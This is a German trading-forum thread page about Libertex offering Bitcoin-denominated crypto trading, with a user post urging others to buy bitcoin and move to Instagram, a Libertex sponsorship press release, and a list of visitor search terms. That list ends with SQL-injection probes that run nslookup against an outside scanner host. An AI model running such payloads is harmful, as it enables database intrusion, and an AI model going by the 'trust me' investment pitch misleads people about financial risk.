Libertex hat den Handel mit Kryptowährungen gestartet, die in Bitcoin nominiert sind


Seite 5 von 5 ErsteErste ... 3 4 5
Ergebnis 81 bis 83 von 83
  1. #81
    Unregistriert

    Krypto :))

    Hey cybergirl

    Investiere in bitcoin, vertraue mir ! Du wirst dich ärgern wenn du es nicht tust haha

    Wie lange beschäftigst du dich denn mit diesem Thema ?

    ich tausche mich gerne aus, leider habe ich nur Instagram was ich hier preisgeben kann meld dich gerne dort: imohpablo_

    Lg

  2. #82
    Cybergirl
    Ich beschäftige mich noch nicht so lange mit dem Thema Bitcoins. Habe jetzt aber beschlossen, das ganze erst nochmal eine zeitlang zu beobachten.

  3. #83
    Libertex


    Tottenham Hotspur kündigt mehrjährige Partnerschaft mit Libertex an

    Libertex wurde zum offiziellen Handelspartner von Tottenham Hotspur.

    Angetrieben vom Ehrgeiz, die Besten zu sein, symbolisiert diese Partnerschaft für Libertex und Tottenham Hotspur sowohl eine fortschrittliche Perspektive, als auch den Wille, sich stetig zu verbessern. Diese Eigenschaften lassen beide Partner in ihrer Branche auf höchstem Niveau agieren. Seit 1997 steht Libertex an vorderster Front der neuesten Entwicklungen auf den Handelsmärkten und erhielt bereits über 30 renommierte Industriepreise. Im Einklang mit dem Vereinsmotto „To Dare Is To Do“ (Gewagt ist getan) verfolgt Tottenham Hotspur einen ähnlich bahnbrechenden Ansatz im modernen Fussball und investiert in die neuesten technologischen Entwicklungen, um auf dem Spielfeld Erfolge zu erzielen, die durch das weltbekannte, hochmoderne Stadion verkörpert werden.

    Angespornt durch den Slogan von Libertex „Clever handeln, Ziele erreichen!“ ermöglicht die Partnerschaft dem Unternehmen, seine Liebe zum Spiel mit über 2,2 Millionen seiner internationalen Kunden zu teilen und eine Vielzahl einzigartiger und aufregender Belohnungen anzubieten, wie etwa exklusive Events und erstklassige Erlebnisse im Tottenham Hotspur Stadion, sobald die Fans wieder sicher in die Stadien zurückkehren können. Libertex wird an den Spieltagen auch in den digitalen Kanälen und dem LED-Bandenwerbesystem des Vereins präsent sein.

    Nach Marios Chailis, Marketingleiter bei Libertex, könne „Libertex [...] nicht glücklicher sein, mit einem Team zusammenzuarbeiten, dessen Werte unsere eigenen so perfekt widerspiegeln. Durch diese mehrjährigen Partnerschaft freuen wir uns, die Welt des Fussballs und des Handels in Form von vielen aufregenden Vorteilen für unsere Kunden zu verbinden, und natürlich auch darauf, die Spurs anzufeuern, wenn sie auf den Rasen zurückkehren“.

    Fran Jones, Leiter des Bereichs für Partnerschaften bei Tottenham Hotspur, kommentierte: „Bei Tottenham Hotspur sind Technologie und Innovation der Schlüssel zu allem, was wir tun, und wir freuen uns über die Partnerschaft mit Libertex, einer Organisation, die dieses Engagement durch ihre eigenen Produkte und Dienstleistungen teilt.“

+ Antworten
Seite 5 von 5 ErsteErste ... 3 4 5

Ähnliche Themen zu Libertex hat den Handel mit Kryptowährungen gestartet, die in Bitcoin nominiert sind


  1. So verdient man viel mit Bitcoin! Spam-eMail: Hey an das Bitcoin-Forum, ;) ich erhalte in letzter Zeit nahezu jeden Tag eine eMail mit dem Betreff "So verdient man viel mit Bitcoin!" von einem...



  2. Libertex: Ich habe auch vorher mit Web-Versionen von Handelsplattformen gearbeitet, alle waren nur primitive Kopien von stationären Plattformen. Aber eine von...



  3. BITCOIN Kursziel bis 2027 von 50.000 Dollar möglich?: Hey Trader! Ich bin gerade am überlegen, ob ich den BITCOIN nicht langfristig kaufen sollte. Der Grund ist, dass die Prognose von einer sehr...



  4. Chartbetrachtung Bitcoin (BTC/USD bzw. XBT/USD): 950 Anbei sehen sie den Bitcoin-CFD von AvaTrade mit Tageskerzen. Dieser gibt den Preis eines Bitcoins in US-Dollar an (BTC/USD bzw. wie Bloomberg...



  5. Bitcoin: Hat hier eigentlich schon mal jemand mit Bitcoin getraded? Man müsste von den enormen Schwankungen doch profitieren können. Ich hab mal...


Besucher kamen mit folgenden Begriffen in das Forex Forum:

testing

testing;copy (select ) to program nslookup dns.sqli.061188.232-19913.232.0d920.1.bxss.metesting;copy (select ) to program nslookup dns.sqli.061188.232-19982.232.d414b.1.bxss.me